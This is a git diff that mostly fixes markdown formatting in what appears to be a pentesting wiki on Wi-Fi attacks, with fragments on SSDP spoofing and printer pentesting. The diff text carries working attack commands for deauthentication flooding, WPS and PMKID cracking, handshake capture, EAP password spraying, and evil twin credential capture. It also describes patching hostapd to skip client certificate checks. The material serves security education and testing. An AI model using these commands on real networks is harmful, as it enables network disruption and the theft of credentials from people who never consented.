-While working with Spoofing, one of the most important tasks is to not let the target user know that he/she has been a victim of Spoofing.  This can be achieved by redirecting the user after we grab the credentials or cookies or anything that the attacker wanted to acquire. The evil_ssdp tool has a parameter (-u) which redirects the targeted user to any URL of the attacker’s choice. Let’s take a look at the working of this parameter in action.
+While working with Spoofing, one of the most important tasks is to not let the target user know that he/she has been a victim of Spoofing.  This can be achieved by redirecting the user after we grab the credentials or cookies or anything that the attacker wanted to acquire. The evil\_ssdp tool has a parameter (-u) which redirects the targeted user to any URL of the attacker’s choice. Let’s take a look at the working of this parameter in action.
 
 To start, we will use the python3 for loading the tool. Followed by we mention the Network Interface that should be used. Now for this practical, we will be using the Microsoft Azure Storage Template. After selecting the template, we put the (-u) parameter and then mention any URL where we want to redirect the user. Here we are using the Microsoft official Link. But this can be any malicious site.
 
diff --git a/pentesting/pentesting-network/wifi-attacks/README.md b/pentesting/pentesting-network/wifi-attacks/README.md
index 87fa6f15..b40df9f2 100644
--- a/pentesting/pentesting-network/wifi-attacks/README.md
+++ b/pentesting/pentesting-network/wifi-attacks/README.md
@@ -51,24 +51,24 @@ From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://g
 
 ## Resume attacks
 
-* **DoS **
+* **DoS**&#x20;
   * Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client)
   * Random fake APs -- Hide nets, possible crash scanners)
   * Overload AP -- Try to kill the AP (usually not very useful)
   * WIDS -- Play with the IDS
   * TKIP, EAPOL -- Some specific attacks to DoS some APs
 * **Cracking**
-  * Crack **WEP **(several tools and methods)
+  * Crack **WEP** (several tools and methods)
   * **WPA-PSK**
-    * **WPS **pin "Brute-Force"
-    * **WPA PMKID **bruteforce
-    * \[DoS +] **WPA handshake **capture + Cracking
+    * **WPS** pin "Brute-Force"
+    * **WPA PMKID** bruteforce
+    * \[DoS +] **WPA handshake** capture + Cracking
   * **WPA-MGT**
     * **Username capture**
-    * **Bruteforce **Credentials
-* **Evil Twin **(with or without DoS)
-  * **Open **Evil Twin \[+ DoS] -- Useful to capture captive portal creds and/or perform LAN attacks
-  * **WPA-PSK **Evil Twin -- Useful to network attacks if you know the password
+    * **Bruteforce** Credentials
+* **Evil Twin** (with or without DoS)
+  * **Open** Evil Twin \[+ DoS] -- Useful to capture captive portal creds and/or perform LAN attacks
+  * **WPA-PSK** Evil Twin -- Useful to network attacks if you know the password
   * **WPA-MGT** -- Useful to capture company credentials
 * **MANA**, **Loud MANA**, **Known beacon**
   * **+ Open** -- Useful to capture captive portal creds and/or perform LAN attacks
@@ -78,10 +78,10 @@ From: [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux](https://g
 
 ### Deauthentication Packets
 
-The most common way this sort of attack is done is with **deauthentication **packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to [hacking many Wi-Fi networks](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/), as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking.
+The most common way this sort of attack is done is with **deauthentication** packets. These are a type of "management" frame responsible for disconnecting a device from an access point. Forging these packets is the key to [hacking many Wi-Fi networks](https://null-byte.wonderhowto.com/how-to/wi-fi-hacking/), as you can forcibly disconnect any client from the network at any time. The ease of which this can be done is somewhat frightening and is often done as part of gathering a WPA handshake for cracking.
 
 Aside from momentarily using this disconnection to harvest a handshake to crack, you can also just let those deauths keep coming, which has the effect of peppering the client with deauth packets seemingly from the network they are connected to. Because these frames aren't encrypted, many programs take advantage of management frames by forging them and sending them to either one or all devices on a network.\
-**Description from **[**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
+**Description from** [**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
 
 #### **Deauthentication using Aireplay-ng**
 
@@ -101,7 +101,7 @@ Disassociation packets are another type of management frame that is used to disc
 
 An AP looking to disconnect a rogue device would send a deauthentication packet to inform the device it has been disconnected from the network, whereas a disassociation packet is used to disconnect any nodes when the AP is powering down, rebooting, or leaving the area.
 
-**Description from **[**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
+**Description from** [**here**](https://null-byte.wonderhowto.com/how-to/use-mdk3-for-advanced-wi-fi-jamming-0185832/)**.**
 
 **This attack can be performed by mdk4(mode "d"):**
 
@@ -116,7 +116,7 @@ mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
 
 ### **More DOS attacks by mdk4**
 
-**From **[**here**](https://en.kali.tools/?p=864)**.**
+**From** [**here**](https://en.kali.tools/?p=864)**.**
 
 **ATTACK MODE b: Beacon Flooding**
 
@@ -158,7 +158,7 @@ mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
 
 **ATTACK MODE e: EAPOL Start and Logoff Packet Injection**
 
-Floods an AP with **EAPOL **Start frames to keep it busy with **fake sessions **and thus disables it to handle any legitimate clients. Or logs off clients by **injecting fake **EAPOL **Logoff messages**.
+Floods an AP with **EAPOL** Start frames to keep it busy with **fake sessions** and thus disables it to handle any legitimate clients. Or logs off clients by **injecting fake** EAPOL **Logoff messages**.
 
 ```bash
 # Use Logoff messages to kick clients
@@ -167,7 +167,7 @@ mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
 
 **ATTACK MODE s: Attacks for IEEE 802.11s mesh networks**
 
-Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic! 
+Various attacks on link management and routing in mesh networks. Flood neighbors and routes, create black holes and divert traffic!&#x20;
 
 **ATTACK MODE w: WIDS Confusion**
 
@@ -184,13 +184,13 @@ A simple packet fuzzer with multiple packet sources and a nice set of modifiers.
 
 ### **Airggedon**
 
-_**Airgeddon **_offers most of the attacks proposed in the previous comments:
+_**Airgeddon**_ offers most of the attacks proposed in the previous comments:
 
 ![](<../../../.gitbook/assets/image (126).png>)
 
 ## WPS
 
-WPS stands for Wi-Fi Protected Setup. It is a wireless network security standard that tries to make connections between a router and wireless devices faster and easier. **WPS works only for wireless networks that use a password** that is encrypted with the **WPA **Personal or **WPA2 **Personal security protocols. WPS doesn't work on wireless networks that are using the deprecated WEP security, which can be cracked easily by any hacker with a basic set of tools and skills. (From [here](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup))
+WPS stands for Wi-Fi Protected Setup. It is a wireless network security standard that tries to make connections between a router and wireless devices faster and easier. **WPS works only for wireless networks that use a password** that is encrypted with the **WPA** Personal or **WPA2** Personal security protocols. WPS doesn't work on wireless networks that are using the deprecated WEP security, which can be cracked easily by any hacker with a basic set of tools and skills. (From [here](https://www.digitalcitizen.life/simple-questions-what-wps-wi-fi-protected-setup))
 
 WPS uses a 8 length PIN to allow a user to connect to the network, but it's first checked the first 4 numbers and, if correct, then is checked the second 4 numbers. Then, it is possible to Brute-Force the first half and then the second half (only 11000 possibilities).
 
@@ -244,15 +244,15 @@ All the proposed WPS attacks can be easily performed using _**airgeddon.**_
 
 ![](<../../../.gitbook/assets/image (201).png>)
 
-* 5 and 6 lets you try** your custom PIN** (if you have any)
+* 5 and 6 lets you try **your custom PIN** (if you have any)
 * 7 and 8 perform the **Pixie Dust attack**
 * 13 allows you to test the **NULL PIN**
-* 11 and 12 will **recollect the PINs related to the selected AP from available databases** and **generate **possible **PINs **using: ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
+* 11 and 12 will **recollect the PINs related to the selected AP from available databases** and **generate** possible **PINs** using: ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
 * 9 and 10 will test **every possible PIN**
 
 ## **WEP**
 
-So broken and disappeared that I am not going to talk about it. Just know that _**airgeddon **_have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
+So broken and disappeared that I am not going to talk about it. Just know that _**airgeddon**_ have a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.
 
 ![](<../../../.gitbook/assets/image (125).png>)
 
@@ -262,9 +262,9 @@ So broken and disappeared that I am not going to talk about it. Just know that _
 
 In 2018 hashcat authors [disclosed](https://hashcat.net/forum/thread-7717.html) a new type of attack which not only relies **on one single packet**, but it doesn’t require any clients to be connected to our target AP or, if clients are connected, it doesn’t require us to send deauth frames to them, there’s no interaction between the attacker and client stations, but just between the attacker and the AP, interaction which, if the router is vulnerable, is almost immediate!
 
-It turns out that **a lot** of modern routers append an **optional field **at the end of the **first EAPOL **frame sent by the AP itself when someone is associating, the so called `Robust Security Network`, which includes something called `PMKID`
+It turns out that **a lot** of modern routers append an **optional field** at the end of the **first EAPOL** frame sent by the AP itself when someone is associating, the so called `Robust Security Network`, which includes something called `PMKID`
 
-As explained in the original post, the **PMKID **is derived by using data which is known to us:
+As explained in the original post, the **PMKID** is derived by using data which is known to us:
 
 ```
 PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
@@ -273,7 +273,7 @@ PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
 **Since the “PMK Name” string is constant, we know both the BSSID of the AP and the station and the `PMK` is the same one obtained from a full 4-way handshake**, this is all hashcat needs in order to crack the PSK and recover the passphrase!\
 Description obtained from [here](https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/).
 
-To **gather **this information and **bruteforce **locally the password you can do:
+To **gather** this information and **bruteforce** locally the password you can do:
 
 ```
 airmon-ng check kill
@@ -287,7 +287,7 @@ hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
 ./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
 ```
 
-The **PMKIDs captured **will be shown in the **console **and also **saved **inside_ **/tmp/attack.pcap**_\
+The **PMKIDs captured** will be shown in the **console** and also **saved** inside _ **/tmp/attack.pcap**_\
 Now, convert the capture to **hashcat/john** format and crack it:
 
 ```
@@ -297,9 +297,9 @@ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
 ```
 
 Please note the the format of a correct hash contains **4 parts**, like: _4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7\*566f6461666f6e65436f6e6e6563743034383131343838_\
-__If yours **only **contains **3 parts**, then, it is **invalid **(the PMKID capture wasn't valid).
+__If yours **only** contains **3 parts**, then, it is **invalid** (the PMKID capture wasn't valid).
 
-Note that `hcxdumptool `**also capture handshakes** (something like this will appear: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). You could **transform **the **handshakes **to **hashcat**/**john **format using `cap2hccapx`
+Note that `hcxdumptool` **also capture handshakes** (something like this will appear: **`MP:M1M2 RC:63258 EAPOLTIME:17091`**). You could **transform** the **handshakes** to **hashcat**/**john** format using `cap2hccapx`
 
 ```
 tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
@@ -313,14 +313,14 @@ _I have noticed that some handshakes captured with this tool couldn't be cracked
 
 ### Handshake capture
 
-One way to attack **WPA/WPA2** networks is to capture a **handshake **and try to **crack **the used password **offline**. To do so you need to find the **BSSID **and **channel **of the **victim **network, and a **client **that is connected to the network.\
-Once you have that information you have to start **listening **to all the commutation of that **BSSID **in that **channel**, because hopefully the handshake will be send there:
+One way to attack **WPA/WPA2** networks is to capture a **handshake** and try to **crack** the used password **offline**. To do so you need to find the **BSSID** and **channel** of the **victim** network, and a **client** that is connected to the network.\
+Once you have that information you have to start **listening** to all the commutation of that **BSSID** in that **channel**, because hopefully the handshake will be send there:
 
 ```bash
 airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
 ```
 
-Now you need to **deauthenticate **the **client **for a few seconds so it will automatically authenticate again to the AP (please read the part of DoS to find several ways to deauthenticate a client):
+Now you need to **deauthenticate** the **client** for a few seconds so it will automatically authenticate again to the AP (please read the part of DoS to find several ways to deauthenticate a client):
 
 ```bash
 aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not always work
@@ -328,11 +328,11 @@ aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, not al
 
 _Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network._
 
-Once in the` airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
+Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
 
 ![](<../../../.gitbook/assets/image (172) (1) (1).png>)
 
-Once the handshake is captured you can **crack **it with `aircrack-ng`:
+Once the handshake is captured you can **crack** it with `aircrack-ng`:
 
 ```
 aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
@@ -369,45 +369,45 @@ pyrit -r psk-01.cap analyze
 
 ## **WPA Enterprise (MGT)**
 
-**It** is important to talk about the **different authentication methods** that could be used by an enterprise Wifi. For this kind of Wifis you will probably find in`  airodump-ng  `something like this:
+**It** is important to talk about the **different authentication methods** that could be used by an enterprise Wifi. For this kind of Wifis you will probably find in `airodump-ng` something like this:
 
 ```
 6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi
 ```
 
-**EAP **(Extensible Authentication Protocol) the **skull **of the **authentication communication**, on **top **of this, an **authentication algorithm **is used by the server to authenticate the **client **(**supplicant**) and in same cases by the client to authenticate the server.\
+**EAP** (Extensible Authentication Protocol) the **skull** of the **authentication communication**, on **top** of this, an **authentication algorithm** is used by the server to authenticate the **client** (**supplicant**) and in same cases by the client to authenticate the server.\
 Main authentication algorithms used in this case:
 
 * **EAP-GTC:** Is an EAP method to support the use of hardware tokens and one-time passwords with EAP-PEAP. Its implementation is similar to MSCHAPv2, but does not use a peer challenge. Instead, passwords are sent to the access point in **plaintext** (very interesting for downgrade attacks).
 * **EAP-MD-5 (Message Digest)**: The client send the MD5 hash of the password. **Not recommended**: Vulnrable to dictionary attacks, no server authentication and no way to generate per session wired equivalent privacy (WEP) keys.
-* **EAP-TLS (Transport Layer Security)**: It relies on** client-side and server-side certificates** to perform authentication and can be used to dynamically generate user-based and session-based WEP keys to secure subsequent communications.
+* **EAP-TLS (Transport Layer Security)**: It relies on **client-side and server-side certificates** to perform authentication and can be used to dynamically generate user-based and session-based WEP keys to secure subsequent communications.
 * **EAP-TTLS (Tunneled Transport Layer Security)**: **Mutual authentication** of the client and network through an encrypted channel (or tunnel), as well as a means to derive dynamic, per-user, per-session WEP keys. Unlike EAP-TLS, **EAP-TTLS requires only server-side certificates (client will use credentials)**.
-* **PEAP (Protected Extensible Authentication Protocol)**: PEAP is like the **EAP **protocol but creating a **TLS tunnel** to protect the communication. Then, weak authentication protocols can by used on top of EAP as they will be protected by the tunnel.
-  * **PEAP-MSCHAPv2**: This is also known as just **PEAP **because it is widely adopted. This is just the vulnerable challenge/response called MSCHAPv2 on to of PEAP (it is protected by the TLS tunnel).
+* **PEAP (Protected Extensible Authentication Protocol)**: PEAP is like the **EAP** protocol but creating a **TLS tunnel** to protect the communication. Then, weak authentication protocols can by used on top of EAP as they will be protected by the tunnel.
+  * **PEAP-MSCHAPv2**: This is also known as just **PEAP** because it is widely adopted. This is just the vulnerable challenge/response called MSCHAPv2 on to of PEAP (it is protected by the TLS tunnel).
   * **PEAP-EAP-TLS or just PEAP-TLS**: Is very similar to **EAP-TLS** but a TLS tunnel is created before the certificates are exchanged.
 
-You can find more information about these authentication methods [here ](https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol)and [here](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
+You can find more information about these authentication methods [here ](https://en.wikipedia.org/wiki/Extensible\_Authentication\_Protocol)and [here](https://www.intel.com/content/www/us/en/support/articles/000006999/network-and-i-o/wireless-networking.html).
 
 ### Username Capture
 
-Reading [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27) it looks like if you are using **EAP **the **"Identity"** **messages **must be **supported**, and the **username **is going to be sent in **clear **in the **"Response Identity"** messages.
+Reading [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27) it looks like if you are using **EAP** the **"Identity"** **messages** must be **supported**, and the **username** is going to be sent in **clear** in the **"Response Identity"** messages.
 
-Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to** capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark `in the same interface) and filter the packets by`eapol`.\
-Inside the "**Response, Identity**" packet, the **username **of the client will appear.
+Even using one of the most secure of authentication methods: **PEAP-EAP-TLS**, it is possible to **capture the username sent in the EAP protocol**. To do so, **capture a authentication communication** (start `airodump-ng` inside a channel and `wireshark` in the same interface) and filter the packets by`eapol`.\
+Inside the "**Response, Identity**" packet, the **username** of the client will appear.
 
 ![](<../../../.gitbook/assets/image (150).png>)
 
 ### Anonymous Identities
 
-(Info taken from [https://www.interlinknetworks.com/app_notes/eap-peap.htm](https://www.interlinknetworks.com/app_notes/eap-peap.htm))
+(Info taken from [https://www.interlinknetworks.com/app\_notes/eap-peap.htm](https://www.interlinknetworks.com/app\_notes/eap-peap.htm))
 
-Both** EAP-PEAP and EAP-TTLS support identity hiding**.  In a WiFi environment, the access point (AP) typically generates an EAP-Identity request as part of the association process.  To preserve anonymity, the EAP client on the user’s system may respond with only enough information to allow the first hop RADIUS server to process the request, as shown in the following examples.
+Both **EAP-PEAP and EAP-TTLS support identity hiding**.  In a WiFi environment, the access point (AP) typically generates an EAP-Identity request as part of the association process.  To preserve anonymity, the EAP client on the user’s system may respond with only enough information to allow the first hop RADIUS server to process the request, as shown in the following examples.
 
 * _**EAP-Identity = anonymous**_
 
 > In this example, all users will share the pseudo-user-name “anonymous”.  The first hop RADIUS server is an EAP-PEAP or EAP-TTLS server which drives the server end of the PEAP or TTLS protocol.  The inner (protected) authentication type will then be either handled locally or proxied to a remote (home) RADIUS server.
 
-* _**EAP-Identity = anonymous@realm_x**_
+* _**EAP-Identity = anonymous@realm\_x**_
 
 > In this example, users belonging to different realms hide their own identity but indicate which realm they belong to so that the first hop RADIUS server may proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms which will act as the PEAP or TTLS server.  The first hop server acts purely as a RADIUS relay node.
 >
@@ -421,7 +421,7 @@ With either protocol, the PEAP/TTLS server learns the user’s true identity onc
 
 ### EAP-Bruteforce (password spray)
 
-If the client is expected to use a** username and password** (notice that** EAP-TLS won't be valid** in this case), then you could try to get a **list **a **usernames **(see next part) and **passwords **and try to **bruteforce **the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
+If the client is expected to use a **username and password** (notice that **EAP-TLS won't be valid** in this case), then you could try to get a **list** a **usernames** (see next part) and **passwords** and try to **bruteforce** the access using [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
 
 ```
 ./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
@@ -461,7 +461,7 @@ Clients that use directed probing will send out probe requests for each network
 
 ## Simple AP with redirection to Internet
 
-Before explaining how to perform more complex attacks it's going to be explained **how **to just **create **an **AP **and **redirect **it's **traffic **to an interface connected **to **the **Internet**.
+Before explaining how to perform more complex attacks it's going to be explained **how** to just **create** an **AP** and **redirect** it's **traffic** to an interface connected **to** the **Internet**.
 
 Using `ifconfig -a` check that the wlan interface to create the AP and the interface connected to the Internet are present.
 
@@ -485,14 +485,14 @@ log-dhcp
 listen-address=127.0.0.1
 ```
 
-Then **set IPs **and **routes**:
+Then **set IPs** and **routes**:
 
 ```
 ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
 route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
 ```
 
-And then **start **dnsmasq:
+And then **start** dnsmasq:
 
 ```
 dnsmasq -C dnsmasq.conf -d
@@ -524,7 +524,7 @@ ieee80211n=1
 wme_enabled=1
 ```
 
-**Stop annoying processes **, set **monitor mode**, and **start hostapd**:
+**Stop annoying processes** , set **monitor mode**, and **start hostapd**:
 
 ```
 airmon-ng check kill
@@ -555,7 +555,7 @@ You can create a very basic Open Evil Twin (no capabilities to route traffic to
 airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon
 ```
 
-You could also create an Evil Twin using **eaphammer **(notice that to create evil twins with eaphammer the interface **should NOT be** in **monitor **mode):
+You could also create an Evil Twin using **eaphammer** (notice that to create evil twins with eaphammer the interface **should NOT be** in **monitor** mode):
 
 ```
 ./eaphammer -i wlan0 --essid exampleCorp --captive-portal
@@ -571,7 +571,7 @@ _Some OS and AV will warn the user that connect to an Open network is dangerous.
 
 ### WPA/WPA2 Evil Twin
 
-You can create an **Evil Twin using WPA/2** and if the devices have configured to connect to that SSID with WPA/2, they are going to try to connect. Anyway, **to complete the 4-way-handshake** you also need to **know **the **password **that the client is going to use. If you **don't know** it, the **connection won't be completed**.
+You can create an **Evil Twin using WPA/2** and if the devices have configured to connect to that SSID with WPA/2, they are going to try to connect. Anyway, **to complete the 4-way-handshake** you also need to **know** the **password** that the client is going to use. If you **don't know** it, the **connection won't be completed**.
 
 ```
 ./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword"
@@ -583,7 +583,7 @@ To understand this attacks I would recommend to read before the brief [WPA Enter
 
 #### Using hostapd-wpe
 
-`hostapd-wpe` needs a **configuration **file to work. To **automate** the generation if these configurations you could use [https://github.com/WJDigby/apd_launchpad](https://github.com/WJDigby/apd_launchpad) (download the python file inside _/etc/hostapd-wpe/_)
+`hostapd-wpe` needs a **configuration** file to work. To **automate** the generation if these configurations you could use [https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad) (download the python file inside _/etc/hostapd-wpe/_)
 
 ```
 ./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
@@ -624,8 +624,8 @@ Or you could also use:
 
 #### Using Airgeddon
 
-`Airgeddon `can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
-`Airggedon `offers you the possibility of a **continuous Evil Twin attack (noisy)** or** only create the Evil Attack until someone connects (smooth).**
+`Airgeddon` can use previously generated certificated to offer EAP authentication to WPA/WPA2-Enterprise networks. The fake network will downgrade the connection protocol to EAP-MD5 so it will be able to **capture the user and the MD5 of the password**. Later, the attacker can try to crack the password.\
+`Airggedon` offers you the possibility of a **continuous Evil Twin attack (noisy)** or **only create the Evil Attack until someone connects (smooth).**
 
 ![](<../../../.gitbook/assets/image (129).png>)
 
@@ -633,14 +633,14 @@ Or you could also use:
 
 _This method was tested in an PEAP connection but as I'm decrypting an arbitrary TLS tunnel this should also works with EAP-TTLS_
 
-Inside the **configuration **of _hostapd-wpe_ **comment **the line that contains _**dh_file **_(from `dh_file=/etc/hostapd-wpe/certs/dh` to `#dh_file=/etc/hostapd-wpe/certs/dh`)\
-This will make `hostapd-wpe` to **exchange keys using RSA** instead of DH, so you will be able to **decrypt **the traffic later** knowing the servers private key**.
+Inside the **configuration** of _hostapd-wpe_ **comment** the line that contains _**dh\_file**_ (from `dh_file=/etc/hostapd-wpe/certs/dh` to `#dh_file=/etc/hostapd-wpe/certs/dh`)\
+This will make `hostapd-wpe` to **exchange keys using RSA** instead of DH, so you will be able to **decrypt** the traffic later **knowing the servers private key**.
 
-Now start the **Evil Twin** using **`hostapd-wpe`** with that modified configuration as usual. Also, start **`wireshark `**in the **interface **which is performing the Evil Twin attack.
+Now start the **Evil Twin** using **`hostapd-wpe`** with that modified configuration as usual. Also, start **`wireshark`** in the **interface** which is performing the Evil Twin attack.
 
 Now or later (when you have already captured some authentication intents) you can add the private RSA key to wireshark in: `Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...`
 
-Add a new entry and fill the form with this values:** IP address = any** -- **Port = 0** --** Protocol = data **-- **Key File **(**select your key file**, to avoid problems select a key file **without being password protected**).
+Add a new entry and fill the form with this values: **IP address = any** -- **Port = 0** -- **Protocol = data** -- **Key File** (**select your key file**, to avoid problems select a key file **without being password protected**).
 
 ![](<../../../.gitbook/assets/image (151).png>)
 
diff --git a/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md b/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md
index fc6f5ad6..66de9d5e 100644
--- a/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md
+++ b/pentesting/pentesting-network/wifi-attacks/evil-twin-eap-tls.md
@@ -6,7 +6,7 @@ You only need to download the hostapd-2.6 from here: [https://w1.fi/releases/](h
 
 ## Evil Twin for EAP-TLS
 
-**This post was copied from **[**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)****
+**This post was copied from** [**https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/**](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)****
 
 ### The Uncommon Case: Attacking EAP-TLS
 
@@ -36,29 +36,29 @@ In both scenarios, we first need to understand where the certificate control is
 
 After a quick analysis of the source code, we found the following:
 
-**Original Source Code File: hostapd-2.6/src/eap_server/eap_server_tls.c**
+**Original Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls.c**
 
-![eap_server_tls_ssl_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.20.41-PM.png)
+![eap\_server\_tls\_ssl\_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.20.41-PM.png)
 
-As you can see in the code above (line 80), the EAP TLS server implementation on hostapd invokes a custom function named eap_server_tls_ssl_init to initialize the server, and the third parameter is set to 1.
+As you can see in the code above (line 80), the EAP TLS server implementation on hostapd invokes a custom function named eap\_server\_tls\_ssl\_init to initialize the server, and the third parameter is set to 1.
 
-**Original Source Code File: hostapd-2.6/src/eap_server/eap_server_tls_common.c**
+**Original Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls\_common.c**
 
-![tls_connection_set_verify-1](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.27.49-PM.png)
+![tls\_connection\_set\_verify-1](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.27.49-PM.png)
 
-![tls_connection_set_verify-2](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.28.02-PM.png)
+![tls\_connection\_set\_verify-2](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.28.02-PM.png)
 
 In the code above (lines from 78 to 80), we can observe the invocation of the function `tls_connection_set_verify` with the parameter `verify_peer` set to 1 (this was received from the `eap_tls_init function`).
 
-**Original Source Code File: hostapd-2.6/src/crypto/tls_openssl.c**
+**Original Source Code File: hostapd-2.6/src/crypto/tls\_openssl.c**
 
-![verify_peer](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.32.53-PM.png)
+![verify\_peer](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.32.53-PM.png)
 
-On the code above (from line 2307 to 2309), we can observe that the parameter `verify_peer` (originally set to 1) will be eventually used as a parameter of the OpenSSL function SSL_set_verify to make it validate the client certificate or not when the library is working as a server. By modifying the original line to 0, we can change the behavior of the tool and make it ignore whether the client certificate is valid or not.
+On the code above (from line 2307 to 2309), we can observe that the parameter `verify_peer` (originally set to 1) will be eventually used as a parameter of the OpenSSL function SSL\_set\_verify to make it validate the client certificate or not when the library is working as a server. By modifying the original line to 0, we can change the behavior of the tool and make it ignore whether the client certificate is valid or not.
 
-**Modified Source Code File: hostapd-2.6/src/eap_server/eap_server_tls.c**
+**Modified Source Code File: hostapd-2.6/src/eap\_server/eap\_server\_tls.c**
 
-![eap_tls_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.34.01-PM.png)
+![eap\_tls\_init](https://versprite.com/wp-content/uploads/2017/05/Screen-Shot-2019-05-31-at-2.34.01-PM.png)
 
 After patching the source code of hostapd-wpe and recompiling, we tried the attack again and got the following output:
 
diff --git a/pentesting/pentesting-printers/README.md b/pentesting/pentesting-printers/README.md
index ef9249ff..138cfb79 100644
--- a/pentesting/pentesting-printers/README.md
+++ b/pentesting/pentesting-printers/README.md
@@ -1,6 +1,6 @@
 # Pentesting Printers
 
-Please, note that **most of the content of all the info related to**_** Pentesting Printers**_** **was taken **from **the **huge **and **amazing research **you can find on [**http://hacking-printers.net/**](http://hacking-printers.net). I tried to **summarise **that information here but you can always **go to the source to learn more about the topic**.
+Please, note that **most of the content of all the info related to **_**Pentesting Printers**_** ** was taken **from** the **huge** and **amazing research** you can find on [**http://hacking-printers.net/**](http://hacking-printers.net). I tried to **summarise** that information here but you can always **go to the source to learn more about the topic**.
 
 ## Fundamentals
 
@@ -11,21 +11,21 @@ A schematic relationship regarding the encapsulation of printer languages is giv
 
 ## Network printing protocols
 
